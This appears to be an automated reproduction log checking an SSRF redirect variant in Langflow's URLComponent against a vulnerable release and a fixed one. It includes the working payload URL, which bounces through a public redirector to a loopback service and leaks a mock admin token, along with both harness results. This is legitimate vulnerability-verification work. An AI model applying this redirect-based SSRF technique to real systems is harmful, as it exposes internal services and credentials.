[2026-07-05T09:47:04+00:00] Submitted vulnerable reference v1.9.3 resolves to: 322e4908b931a3efe2d65c6a7ad5ec373c5a5e1d [2026-07-05T09:47:04+00:00] Fixed/latest source reference HEAD resolves to: 315cc41b43c446bfb0e63d420ca55021f6f8987e [2026-07-05T09:47:04+00:00] Started loopback-only internal marker service pid=76867 on 127.0.0.1:9998 [2026-07-05T09:47:04+00:00] Testing URLComponent with public redirector URL: https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9998%2Fmarker [2026-07-05T09:47:10+00:00] Vulnerable URLComponent harness exit code: 0 /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/langchain_core/utils/pydantic.py:41: UserWarning: Core Pydantic V1 functionality isn't compatible with Python 3.14 or greater. from pydantic.v1 import BaseModel as BaseModelV1 /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/lfx/components/data_source/url.py:199: MarkupResemblesLocatorWarning: The input looks more like a filename than markup. You may want to open this file and pass the filehandle into Beautiful Soup. return BeautifulSoup(x, "lxml").get_text() /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/langchain_community/document_loaders/recursive_url_loader.py:44: MarkupResemblesLocatorWarning: The input looks more like a filename than markup. You may want to open this file and pass the filehandle into Beautiful Soup. soup = BeautifulSoup(raw_html, "html.parser") {"component": "URLComponent", "component_file": "/data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/lfx/components/data_source/url.py", "component_module": "lfx.components.data_source.url", "data_preview": "[{\"text\": \"{\\\"service\\\": \\\"internal-admin\\\", \\\"endpoint\\\": \\\"/marker\\\", \\\"secret\\\": \\\"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\\\", \\\"credential_type\\\": \\\"langflow_admin_bearer_token\\\", \\\"note\\\": \\\"loopback-only marker for URLComponent redirect SSRF variant\\\"}\", \"url\": \"https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9998%2Fmarker\", \"title\": \"\", \"description\": \"\", \"content_type\": \"application/json\", \"language\": \"\"}]", "document_count": 1, "fetch_url_contents_is_async": false, "has_build_http_client_method": false, "has_redirect_revalidation_method": false, "langchain_community_version": "0.4.2", "lfx_version": "0.4.6", "marker_in_output": true, "mode": "sync", "ok": true, "variant_reached_internal": true} [2026-07-05T09:47:10+00:00] Vulnerable URLComponent reached internal marker: true [2026-07-05T09:47:15+00:00] Fixed/latest URLComponent harness exit code: 3 /data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/data/venv/lib/python3.14/site-packages/langchain_core/utils/pydantic.py:41: UserWarning: Core Pydantic V1 functionality isn't compatible with Python 3.14 or greater. from pydantic.v1 import BaseModel as BaseModelV1 {"component": "URLComponent", "component_file": "/data/pruva/runs/50e1d94c-35c4-431a-b622-d84ef4d2d9ee/bundle/vuln_variant/fixed_overlay/lfx/components/data_source/url.py", "component_module": "lfx.components.data_source.url", "error": "ValueError: Error loading documents: SSRF Protection: blocked redirect to http://127.0.0.1:9998/marker: SSRF Protection: Hostname 127.0.0.1 resolves to blocked IP address(es): 127.0.0.1. To allow this hostname, add it to LANGFLOW_SSRF_ALLOWED_HOSTS environment variable.", "fetch_url_contents_is_async": true, "has_build_http_client_method": true, "has_redirect_revalidation_method": true, "langchain_community_version": "0.4.2", "lfx_version": "0.4.6", "marker_in_output": false, "mode": "sync", "ok": false, "variant_reached_internal": false} [2026-07-05T09:47:15+00:00] Fixed/latest URLComponent reached internal marker: false [2026-07-05T09:47:15+00:00] VERDICT: alternate same-root-cause trigger on vulnerable target; fixed/latest blocks it (not a bypass).